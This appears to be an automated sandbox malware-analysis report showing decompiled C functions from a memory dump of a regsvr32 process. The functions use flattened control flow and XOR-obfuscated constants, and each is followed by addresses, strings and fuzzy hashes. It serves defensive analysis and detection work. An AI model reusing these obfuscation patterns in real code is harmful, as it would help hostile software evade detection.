				_t285 =  *0x40f6214; // 0x0
				_t242 = E040E09DD(_v52, _t285 + 0x23c, _v48, _v72);
				_t293 = _a4 + 0x2c;
				_t243 = E040F061D(_v24, _a4 + 0x2c, _t242, _v60, _v96);
				_t302 = _t243;
				if(_t243 != 0) {
					_push(_v16);
					_push(_v8);
					_push(_v88);
					E040F2D0A(_v12, _t302, _t293, _v68, _v44, _v64, _a8,  &_v616,  *((intOrPtr*)(_a8 + 0x3c)), E040EE1F8(0x40d1000, _v80, _t302));
					E040EFECB(_t246, _v76, _v28, _v20, _v40);
					E040DD061( &_v616, _v56, _v32, _v92, _v84);
				}
				return 1;
			}

0x040ebf06
0x040ebf15
0x040ebf1a
0x040ebf1f
0x040ebf23
0x040ebf2a
0x040ebf31
0x040ebf35
0x040ebf3c
0x040ebf43
0x040ebf4a
0x040ebf51
0x040ebf58
0x040ebf5f
0x040ebf63
0x040ebf66
0x040ebf69
0x040ebf6d
0x040ebf70
0x040ebf77
0x040ebf7a
0x040ebf81
0x040ebf88
0x040ebf8c
0x040ebf93
0x040ebf9a
0x040ebfa1
0x040ebfa8
0x040ebfaf
0x040ebfb3
0x040ebfba
0x040ebfc1
0x040ebfc8
0x040ebfcf
0x040ebfd6
0x040ebfda
0x040ebfde
0x040ebfe2
0x040ebfe9
0x040ebff3
0x040ebff8
0x040ebffd
0x040ec004
0x040ec00b
0x040ec012
0x040ec019
0x040ec020
0x040ec027
0x040ec02e
0x040ec039
0x040ec03a
0x040ec03d
0x040ec044
0x040ec04b
0x040ec052
0x040ec059
0x040ec060
0x040ec067
0x040ec06e
0x040ec072
0x040ec079
0x040ec080
0x040ec08c
0x040ec08f
0x040ec096
0x040ec09f
0x040ec0a6
0x040ec0ad
0x040ec0b9
0x040ec0be
0x040ec0c6
0x040ec0cb
0x040ec0d4
0x040ec0d7
0x040ec0da
0x040ec0e1
0x040ec0ec
0x040ec0ef
0x040ec0f6
0x040ec0fd
0x040ec104
0x040ec10b
0x040ec112
0x040ec119
0x040ec120
0x040ec12e
0x040ec134
0x040ec139
0x040ec13e
0x040ec145
0x040ec14c
0x040ec153
0x040ec157
0x040ec15e
0x040ec165
0x040ec169
0x040ec170
0x040ec17a
0x040ec17d
0x040ec180
0x040ec18d
0x040ec19c
0x040ec1ad
0x040ec1b3
0x040ec1bb
0x040ec1bd
0x040ec1c0
0x040ec1c8
0x040ec1cb
0x040ec1fa
0x040ec20d
0x040ec224
0x040ec22c
0x040ec234

Strings

8~", xrefs: 040EBF5F
$w%, xrefs: 040EC027
', xrefs: 040EC145

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: '$8~"$$w%
API String ID: 1586166983-1780403920
Opcode ID: 3339707a888a2ace010cd1c6d82d795193850f8edd06265aa978aebf576017c4
Instruction ID: 273e06a4aa4fabcf4ac38c2fd5867542007187ead1b450ee484b600e76116b46
Opcode Fuzzy Hash: 3339707a888a2ace010cd1c6d82d795193850f8edd06265aa978aebf576017c4
Instruction Fuzzy Hash: FBA12171D00209EBDF18CFE1D98A9EEBBB2FB44318F208059E511BA264D7B51A56CF50

Uniqueness

Uniqueness Score: -1.00%

Function 040ED8DB, Relevance: 3.9, Strings: 3, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E040ED8DB(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				unsigned int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t128;
				signed int _t142;
				signed int _t153;
				signed int _t155;
				signed int* _t163;
				void* _t164;
				signed int* _t167;

				_push(_a8);
				_t163 = __edx;
				_t153 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t128);
				_v104 = 0xcf676c;
				_t167 =  &(( &_v116)[4]);
				_v104 = _v104 + 0xb3f2;
				_v104 = _v104 | 0x988d6f24;
				_t164 = 0x3ef4407;
				_v104 = _v104 << 0xf;
				_v104 = _v104 ^ 0xbfbf0000;
				_v68 = 0xc42241;
				_v68 = _v68 + 0x399a;
				_v68 = _v68 ^ 0x00ce5291;
				_v88 = 0x75dd03;
				_v88 = _v88 + 0x7dba;
				_v88 = _v88 >> 6;
				_v88 = _v88 ^ 0x0008d458;
				_v72 = 0x2f46be;
				_v72 = _v72 + 0xffffdb55;
				_v72 = _v72 ^ 0x002db90e;
				_v76 = 0x23e806;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x000f8af6;
				_v116 = 0x607e6d;
				_v116 = _v116 << 0x10;
				_v116 = _v116 + 0xffff6686;
				_v116 = _v116 | 0x3d181bb2;
				_v116 = _v116 ^ 0x7f71bdaf;
				_v96 = 0x2cc21a;
				_v96 = _v96 | 0xe9438a5f;
				_t155 = 0x3a;
				_v96 = _v96 * 0x13;
				_v96 = _v96 ^ 0x5347ec85;
				_v108 = 0xb3af1a;
				_v108 = _v108 / _t155;
				_v108 = _v108 + 0x8361;
				_v108 = _v108 | 0x789ced77;
				_v108 = _v108 ^ 0x789572df;
				_v92 = 0x2d2920;
				_v92 = _v92 * 0x2c;
				_v92 = _v92 * 0x1e;
				_v92 = _v92 ^ 0xe8dd3266;
				_v80 = 0xc07fec;
				_v80 = _v80 << 9;
				_v80 = _v80 ^ 0x80fbd8c8;
				_v112 = 0xa84277;
				_v112 = _v112 + 0xffffed27;
				_v112 = _v112 * 0x1b;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x0c742dd9;
				_v64 = 0x297b8a;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x0005dd25;
				_v84 = 0x5c8db2;
				_v84 = _v84 + 0x6b9b;
				_v84 = _v84 + 0x3228;
				_v84 = _v84 ^ 0x0059c37f;
				_v100 = 0xb4d8ec;
				_v100 = _v100 << 1;
				_v100 = _v100 + 0xe9ba;
				_v100 = _v100 | 0x2516dceb;
				_v100 = _v100 ^ 0x257d75fc;
				do {
					while(_t164 != 0x3ef4407) {
						if(_t164 == 0x3f5e611) {
							_push(_t155);
							_push(_t155);
							_t142 = E040DC5D8(_t163[1]);
							_t167 =  &(_t167[3]);
							 *_t163 = _t142;
							__eflags = _t142;
							if(__eflags != 0) {
								_t164 = 0xddf020d;
								continue;
							}
						} else {
							if(_t164 == 0x4994ece) {
								E040ECAD5(_v64, _v84, __eflags, _v100, _t153 + 4,  &_v60);
							} else {
								if(_t164 == 0x4a51775) {
									_t155 = _t153;
									_t163[1] = E040E6187(_t155);
									_t164 = 0x3f5e611;
									continue;
								} else {
									if(_t164 == 0x9d156cc) {
										_t155 = _v108;
										E040E0A90(_t155, _v92, _v80,  &_v60, _v112,  *_t153);
										_t167 =  &(_t167[4]);
										_t164 = 0x4994ece;
										continue;
									} else {
										if(_t164 != 0xddf020d) {
											goto L13;
										} else {
											_t155 = _t163;
											E040D22A6(_t155, _v116,  &_v60, _v96);
											_t167 =  &(_t167[2]);
											_t164 = 0x9d156cc;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t163;
						_t127 =  *_t163 != 0;
						__eflags = _t127;
						return 0 | _t127;
					}
					_t164 = 0x4a51775;
					 *_t163 =  *_t163 & 0x00000000;
					__eflags =  *_t163;
					_t163[1] = _v104;
					L13:
					__eflags = _t164 - 0xae42d9c;
				} while (__eflags != 0);
				goto L16;
			}

0x040ed8e2
0x040ed8e9
0x040ed8eb
0x040ed8ed
0x040ed8f4
0x040ed8f5
0x040ed8f6
0x040ed8fb
0x040ed903
0x040ed906
0x040ed910
0x040ed918
0x040ed91d
0x040ed927
0x040ed92f
0x040ed937
0x040ed93f
0x040ed947
0x040ed94f
0x040ed957
0x040ed95c
0x040ed964
0x040ed96c
0x040ed974
0x040ed97c
0x040ed984
0x040ed989
0x040ed991
0x040ed999
0x040ed99e
0x040ed9a6
0x040ed9ae
0x040ed9b6
0x040ed9be
0x040ed9cd
0x040ed9ce
0x040ed9d2
0x040ed9da
0x040ed9e8
0x040ed9ec
0x040ed9f4
0x040ed9fc
0x040eda04
0x040eda11
0x040eda1a
0x040eda1e
0x040eda26
0x040eda2e
0x040eda33
0x040eda3b
0x040eda43
0x040eda50
0x040eda59
0x040eda5d
0x040eda65
0x040eda6d
0x040eda72
0x040eda7a
0x040eda82
0x040eda8a
0x040eda92
0x040eda9a
0x040edaa2
0x040edaa6
0x040edaae
0x040edab6
0x040edabe
0x040edabe
0x040edad0
0x040edb5e
0x040edb5f
0x040edb63
0x040edb68
0x040edb6b
0x040edb6d
0x040edb6f
0x040edb71
0x00000000
0x040edb71
0x040edad2
0x040edad8
0x040edbaa
0x040edade
0x040edae4
0x040edb3a
0x040edb41
0x040edb44
0x00000000
0x040edae6
0x040edaec
0x040edb27
0x040edb2b
0x040edb30
0x040edb33
0x00000000
0x040edaee
0x040edaf0
0x00000000
0x040edaf6
0x040edb03
0x040edb05
0x040edb0a
0x040edb0d
0x00000000
0x040edb0d
0x040edaf0
0x040edaec
0x040edae4
0x040edad8
0x040edbb2
0x040edbb4
0x040edbb9
0x040edbb9
0x040edbc0
0x040edbc0
0x040edb7c
0x040edb81
0x040edb81
0x040edb84
0x040edb87
0x040edb87
0x040edb87
0x00000000

Strings

(2, xrefs: 040EDA8A
m~`, xrefs: 040ED991
)-, xrefs: 040EDA04

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )-$(2$m~`
API String ID: 0-2018184401
Opcode ID: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
Instruction ID: c960dd5eb77a1204a027d7067bfd76b64f65bf86da4856f7b09bd6b9a8cee00b
Opcode Fuzzy Hash: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
Instruction Fuzzy Hash: FE7133B24083029FD394DF25D58546FBBF0FBC8358F444A1DF596A6220E3B59A598F83

Uniqueness

Uniqueness Score: -1.00%

Function 040E9774, Relevance: 3.9, Strings: 3, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E040E9774(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* _t119;
				intOrPtr _t132;
				void* _t134;
				void* _t139;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				void* _t158;
				signed int* _t161;

				_push(_a24);
				_push(_a20);
				_push(1);
				_push(_a12);
				_push(1);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t119);
				_v16 = 0xc48506;
				_t161 =  &(( &_v52)[8]);
				_v16 = _v16 + 0xffffac5b;
				_v16 = _v16 ^ 0x00c0af73;
				_t158 = 0;
				_v36 = 0x37ec46;
				_t139 = 0x2fa1272;
				_t11 =  &_v36; // 0x37ec46
				_t154 = 0xf;
				_v36 =  *_t11 / _t154;
				_t155 = 0x17;
				_v36 = _v36 * 0x4d;
				_v36 = _v36 ^ 0x011f94eb;
				_v48 = 0x1c9307;
				_v48 = _v48 + 0xffff180a;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 + 0x45e7;
				_v48 = _v48 ^ 0x000c030c;
				_v20 = 0x2c1c35;
				_v20 = _v20 * 0x1a;
				_v20 = _v20 ^ 0x04724ae3;
				_v52 = 0xfea2f7;
				_v52 = _v52 + 0xffffcd03;
				_v52 = _v52 << 0xf;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0374764b;
				_v24 = 0x4bca1;
				_v24 = _v24 + 0xffff92f8;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x0004173d;
				_v28 = 0xca25f8;
				_v28 = _v28 ^ 0xf07fe4f1;
				_v28 = _v28 | 0xda5170b9;
				_v28 = _v28 ^ 0xfaf3c539;
				_v40 = 0x557f86;
				_v40 = _v40 / _t155;
				_v40 = _v40 | 0x36ce95b0;
				_v40 = _v40 + 0xffff3f34;
				_v40 = _v40 ^ 0x36c02d15;
				_v44 = 0x3d6d99;
				_t156 = 0x16;
				_v44 = _v44 * 0x7d;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0x3bf21f86;
				_v32 = 0x4fb69d;
				_v32 = _v32 << 4;
				_v32 = _v32 / _t156;
				_v32 = _v32 ^ 0x00344331;
				_v8 = 0x9d9959;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x000ae1f8;
				_v12 = 0x98829;
				_v12 = _v12 ^ 0xb9c9dda7;
				_v12 = _v12 ^ 0xb9cd803a;
				_t157 = _v4;
				do {
					while(_t139 != 0x2fa1272) {
						if(_t139 == 0x306b7e5) {
							E040DF9C1(_v4, _v24, _v28, _v40, 1, _a24, 1, _a20, _t139, _v44, _v32);
							_t161 =  &(_t161[9]);
							_t139 = 0xc6d7030;
							_t158 =  !=  ? 1 : _t158;
							continue;
						} else {
							if(_t139 == 0x66d181a) {
								_t132 = E040EBC6B();
								_t157 = _t132;
								if(_t132 != 0xffffffff) {
									_t139 = 0xc4ce558;
									continue;
								}
							} else {
								if(_t139 == 0xc4ce558) {
									_t134 = E040D72C4(_v36,  &_v4, _v48, _v20, _t157, _v52);
									_t161 =  &(_t161[4]);
									if(_t134 != 0) {
										_t139 = 0x306b7e5;
										continue;
									}
								} else {
									if(_t139 != 0xc6d7030) {
										goto L14;
									} else {
										E040F1538(_v8, _v12, _v4);
									}
								}
							}
						}
						L7:
						return _t158;
					}
					_t139 = 0x66d181a;
					L14:
				} while (_t139 != 0xa576bfc);
				goto L7;
			}

0x040e977b
0x040e9781
0x040e9786
0x040e9787
0x040e978b
0x040e978c
0x040e9790
0x040e9791
0x040e9792
0x040e9797
0x040e979f
0x040e97a2
0x040e97ac
0x040e97b4
0x040e97b6
0x040e97be
0x040e97c3
0x040e97c9
0x040e97ce
0x040e97d9
0x040e97dc
0x040e97e0
0x040e97e8
0x040e97f0
0x040e97f8
0x040e97fd
0x040e9805
0x040e980d
0x040e981a
0x040e981e
0x040e9826
0x040e982e
0x040e9836
0x040e983b
0x040e9840
0x040e9848
0x040e9850
0x040e9858
0x040e985d
0x040e9865
0x040e986d
0x040e9875
0x040e987d
0x040e9885
0x040e9895
0x040e9899
0x040e98a1
0x040e98a9
0x040e98b1
0x040e98be
0x040e98bf
0x040e98c3
0x040e98c8
0x040e98cd
0x040e98d5
0x040e98dd
0x040e98e8
0x040e98ec
0x040e98f4
0x040e98fc
0x040e9901
0x040e9909
0x040e9916
0x040e991e
0x040e9926
0x040e992a
0x040e992a
0x040e9938
0x040e99d4
0x040e99d9
0x040e99dc
0x040e99e3
0x00000000
0x040e993a
0x040e9940
0x040e999b
0x040e99a0
0x040e99a5
0x040e99a7
0x00000000
0x040e99a7
0x040e9942
0x040e9948
0x040e9987
0x040e998c
0x040e9991
0x040e9993
0x00000000
0x040e9993
0x040e994a
0x040e9950
0x00000000
0x040e9956
0x040e9962
0x040e9967
0x040e9950
0x040e9948
0x040e9940
0x040e9969
0x040e9971
0x040e9971
0x040e99eb
0x040e99f0
0x040e99f0
0x00000000

Strings

E, xrefs: 040E97FD
F7, xrefs: 040E97C3
1C4, xrefs: 040E98EC

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 1C4$F7$E
API String ID: 0-3303878784
Opcode ID: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
Instruction ID: bfc657a3ffbf463938a786ca0c2060b15d6490a7a4e2468a96b1a1459f3b44de
Opcode Fuzzy Hash: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
Instruction Fuzzy Hash: 3C5177B1109341AFD398CF2AD98582FBBE1FBC4748F405A1DF29266260D370DA19CB43

Uniqueness

Uniqueness Score: -1.00%

Function 040DB820, Relevance: 3.9, Strings: 3, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E040DB820(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				void* _t158;
				void* _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				intOrPtr _t192;
				intOrPtr* _t193;
				intOrPtr _t194;
				signed int* _t196;

				_t196 =  &_v68;
				_v16 = 0xd87d65;
				_v12 = 0x358b32;
				_v8 = 0xe06945;
				_t192 =  *0x40f6210; // 0x0
				_v4 = 0;
				_t162 = __ecx;
				_v68 = 0xf23e36;
				_t193 = _t192 + 0x210;
				_v68 = _v68 ^ 0x9abe7b4c;
				_t164 = 0x28;
				_v68 = _v68 / _t164;
				_v68 = _v68 + 0xffff9758;
				_v68 = _v68 ^ 0x03db1914;
				_v28 = 0x153966;
				_v28 = _v28 + 0xc98d;
				_v28 = _v28 ^ 0x00189a49;
				_v32 = 0x66a403;
				_v32 = _v32 + 0x4aa1;
				_v32 = _v32 ^ 0x006148cf;
				_v44 = 0xfe7e73;
				_v44 = _v44 + 0xffff9639;
				_v44 = _v44 | 0x437ec796;
				_v44 = _v44 ^ 0x43f7a292;
				_v48 = 0x44000d;
				_t165 = 0x26;
				_v48 = _v48 / _t165;
				_v48 = _v48 | 0x123d3176;
				_v48 = _v48 ^ 0x1230a07a;
				_v60 = 0x1c671b;
				_v60 = _v60 | 0x089dc1d7;
				_t166 = 0x64;
				_v60 = _v60 / _t166;
				_t167 = 0x5e;
				_v60 = _v60 * 0x62;
				_v60 = _v60 ^ 0x087e3283;
				_v24 = 0x917945;
				_v24 = _v24 ^ 0x5fcd23bd;
				_v24 = _v24 ^ 0x5f54fdfa;
				_v64 = 0xfb1c79;
				_v64 = _v64 ^ 0x3af08dd4;
				_v64 = _v64 + 0x24a6;
				_v64 = _v64 + 0xffffe057;
				_v64 = _v64 ^ 0x3a029534;
				_v36 = 0xae1548;
				_v36 = _v36 * 0x1a;
				_v36 = _v36 + 0x68c6;
				_v36 = _v36 ^ 0x11a48673;
				_v40 = 0xac750c;
				_v40 = _v40 ^ 0x67c11f84;
				_v40 = _v40 | 0x960dc624;
				_v40 = _v40 ^ 0xf7630ea5;
				_v52 = 0x5bbbfa;
				_v52 = _v52 / _t167;
				_v52 = _v52 + 0xc5b0;
				_v52 = _v52 ^ 0x922587b4;
				_v52 = _v52 ^ 0x922f6435;
				_v56 = 0xb91e06;
				_t168 = 0x13;
				_v56 = _v56 / _t168;
				_v56 = _v56 + 0x7f58;
				_v56 = _v56 << 2;
				_v56 = _v56 ^ 0x002d76eb;
				_v20 = 0xce5e52;
				_t169 = 0x56;
				_v20 = _v20 / _t169;
				_v20 = _v20 ^ 0x000b3737;
				while(1) {
					_t194 =  *_t193;
					if(_t194 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t194 + 0x38)) == 0) {
						L4:
						 *_t193 =  *((intOrPtr*)(_t194 + 0x24));
						_t158 = E040F2B09(_v52, _t194, _v56, _v20);
					} else {
						_t158 = E040F1028(_v28, _v32,  *((intOrPtr*)(_t194 + 0x48)), _t162, _v44, _v48);
						_t196 =  &(_t196[4]);
						if(_t158 != _v68) {
							_t193 = _t194 + 0x24;
						} else {
							 *((intOrPtr*)(_t194 + 0x2c))( *((intOrPtr*)(_t194 + 0x38)), 0, 0);
							E040DF0E9(_v72,  *((intOrPtr*)(_t194 + 0x38)), _v36, _v76);
							E040F1538(_v48, _v52,  *((intOrPtr*)(_t194 + 0x48)));
							_t196 =  &(_t196[3]);
							goto L4;
						}
					}
				}
				return _t158;
			}

0x040db820
0x040db823
0x040db82d
0x040db835
0x040db841
0x040db849
0x040db84d
0x040db84f
0x040db857
0x040db85d
0x040db86b
0x040db870
0x040db876
0x040db87e
0x040db886
0x040db88e
0x040db896
0x040db89e
0x040db8a6
0x040db8ae
0x040db8b6
0x040db8be
0x040db8c6
0x040db8ce
0x040db8d6
0x040db8e2
0x040db8e7
0x040db8ed
0x040db8f5
0x040db8fd
0x040db905
0x040db911
0x040db916
0x040db921
0x040db922
0x040db926
0x040db92e
0x040db936
0x040db93e
0x040db946
0x040db94e
0x040db956
0x040db95e
0x040db966
0x040db96e
0x040db97b
0x040db97f
0x040db987
0x040db98f
0x040db997
0x040db99f
0x040db9a7
0x040db9af
0x040db9bd
0x040db9c1
0x040db9c9
0x040db9d1
0x040db9d9
0x040db9e9
0x040db9ee
0x040db9f4
0x040db9fc
0x040dba01
0x040dba09
0x040dba15
0x040dba18
0x040dba1c
0x040dba96
0x040dba96
0x040dba9a
0x00000000
0x00000000
0x040dba29
0x040dba7c
0x040dba8d
0x040dba8f
0x040dba2b
0x040dba3f
0x040dba44
0x040dba4b
0x040dbaa4
0x040dba4d
0x040dba52
0x040dba64
0x040dba74
0x040dba79
0x00000000
0x040dba79
0x040dba4b
0x040dba29
0x040dbaa3

Strings

$P, xrefs: 040DB83F
v-, xrefs: 040DBA01
Ei, xrefs: 040DB835

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$Ei$v-
API String ID: 0-1888193988
Opcode ID: 9c93340132dc69c9996fe62cae07e3eed632e688a68a26c57845e9f5934b159a
Instruction ID: bc6ef686db0d10572c56018b6f2e2215521b419e9b158f62376a7646525a7127
Opcode Fuzzy Hash: 9c93340132dc69c9996fe62cae07e3eed632e688a68a26c57845e9f5934b159a
Instruction Fuzzy Hash: E66134B1508381DFD394CF25D48980BBBF1FBC8718F409A1DF19666260D7B5AA0ACF46

Uniqueness

Uniqueness Score: -1.00%

Function 040F07AA, Relevance: 3.9, Strings: 3, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E040F07AA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t127;
				void* _t143;
				void* _t147;
				intOrPtr _t159;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int* _t172;

				_t145 = _a12;
				_t164 = _a4;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E040EFE29(_t127);
				_v68 = 0xce0704;
				_t172 =  &(( &_v80)[5]);
				_t165 = 0;
				_t147 = 0xeb10c15;
				_t166 = 0x21;
				_v68 = _v68 / _t166;
				_v68 = _v68 ^ 0x27d6a24c;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x13812000;
				_v56 = 0x3987d6;
				_v56 = _v56 + 0xffffa396;
				_v56 = _v56 << 6;
				_v56 = _v56 + 0xffffda2f;
				_v56 = _v56 ^ 0x0e4ab52f;
				_v76 = 0xda5b69;
				_v76 = _v76 + 0xffffc444;
				_v76 = _v76 >> 3;
				_v76 = _v76 | 0xf293bfd0;
				_v76 = _v76 ^ 0xf29c223d;
				_v80 = 0x3698bd;
				_v80 = _v80 << 2;
				_v80 = _v80 + 0xffffb830;
				_v80 = _v80 | 0x7cee6fd8;
				_v80 = _v80 ^ 0x7cfe3832;
				_v44 = 0x3a6f25;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x000731a8;
				_v48 = 0xdbe73e;
				_v48 = _v48 | 0x7450ea9d;
				_v48 = _v48 ^ 0x74de2fdf;
				_v36 = 0x16da79;
				_t167 = 0x12;
				_v36 = _v36 * 0x5d;
				_v36 = _v36 ^ 0x084db146;
				_v60 = 0xec6235;
				_v60 = _v60 + 0x184b;
				_v60 = _v60 / _t167;
				_v60 = _v60 | 0x0c30d5fb;
				_v60 = _v60 ^ 0x0c38efee;
				_v64 = 0x38c801;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0xc825be84;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 ^ 0x000d1c3b;
				_v72 = 0xe77e6e;
				_v72 = _v72 + 0xffffb3b2;
				_v72 = _v72 << 0xd;
				_t168 = 0x78;
				_v72 = _v72 / _t168;
				_v72 = _v72 ^ 0x01e31a81;
				_v40 = 0x7e766a;
				_v40 = _v40 * 0x26;
				_v40 = _v40 ^ 0x12c7afcd;
				_v52 = 0xe103b8;
				_t169 = 0x4e;
				_v52 = _v52 / _t169;
				_v52 = _v52 + 0xffff4b52;
				_v52 = _v52 ^ 0x000d8548;
				do {
					while(_t147 != 0x8d72c38) {
						if(_t147 == 0xc75b0cb) {
							_t143 = E040D57B8( *_t164, _v76, _v80,  *((intOrPtr*)(_t164 + 4)), _v44,  &_v32, _v48);
							_t172 =  &(_t172[6]);
							if(_t143 != 0) {
								_t147 = 0x8d72c38;
								continue;
							}
						} else {
							if(_t147 != 0xeb10c15) {
								goto L8;
							} else {
								_t147 = 0xc75b0cb;
								continue;
							}
						}
						goto L9;
					}
					_t159 =  *0x40f6224; // 0x0
					E040F4D53( *((intOrPtr*)(_t145 + 4)),  *((intOrPtr*)(_t159 + 0x48)), _v36, _t147,  &_v32, _v60, _v64, _v68, _v72, _v40, _t147,  *_t145, _v52);
					_t172 =  &(_t172[0xb]);
					_t147 = 0x3b36d39;
					_t165 =  ==  ? 1 : _t165;
					L8:
				} while (_t147 != 0x3b36d39);
				L9:
				return _t165;
			}

0x040f07ae
0x040f07b5
0x040f07b9
0x040f07ba
0x040f07be
0x040f07bf
0x040f07c1
0x040f07c6
0x040f07ce
0x040f07d7
0x040f07d9
0x040f07e0
0x040f07e5
0x040f07eb
0x040f07f3
0x040f07f8
0x040f0800
0x040f0808
0x040f0810
0x040f0815
0x040f081d
0x040f0825
0x040f082d
0x040f0835
0x040f083a
0x040f0842
0x040f084a
0x040f0852
0x040f0857
0x040f085f
0x040f0867
0x040f086f
0x040f0877
0x040f087c
0x040f0884
0x040f088c
0x040f0894
0x040f089c
0x040f08a9
0x040f08ac
0x040f08b0
0x040f08b8
0x040f08c0
0x040f08d0
0x040f08d4
0x040f08dc
0x040f08e4
0x040f08ec
0x040f08f1
0x040f08f9
0x040f08fe
0x040f0906
0x040f090e
0x040f0916
0x040f091f
0x040f0922
0x040f0926
0x040f092e
0x040f093b
0x040f093f
0x040f0947
0x040f0957
0x040f095f
0x040f0963
0x040f096b
0x040f0973
0x040f0973
0x040f097d
0x040f09a8
0x040f09ad
0x040f09b2
0x040f09b4
0x00000000
0x040f09b4
0x040f097f
0x040f0985
0x00000000
0x040f0987
0x040f0987
0x00000000
0x040f0987
0x040f0985
0x00000000
0x040f097d
0x040f09dd
0x040f09e9
0x040f09f7
0x040f09fc
0x040f0a01
0x040f0a04
0x040f0a04
0x040f0a11
0x040f0a19

Strings

n~, xrefs: 040F0906
jv~, xrefs: 040F092E
5b, xrefs: 040F08B8

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5b$jv~$n~
API String ID: 0-1119068381
Opcode ID: f6e51229730ea4f10ba0dc01f814dd2194ecb53aa907abf745bb6de23b7b3d20
Instruction ID: 875c8c0ece71d0c7d1747c1b0c31e60cb1d55b42423acb421909f49f1dc7a1d0
Opcode Fuzzy Hash: f6e51229730ea4f10ba0dc01f814dd2194ecb53aa907abf745bb6de23b7b3d20
Instruction Fuzzy Hash: 33514672508305AFD748CF25C98981FBBE1FBC8758F508A1DF29666220D371DA89CF46

Uniqueness

Uniqueness Score: -1.00%

Function 040E7A0F, Relevance: 3.9, Strings: 3, Instructions: 137
COMMONCrypto

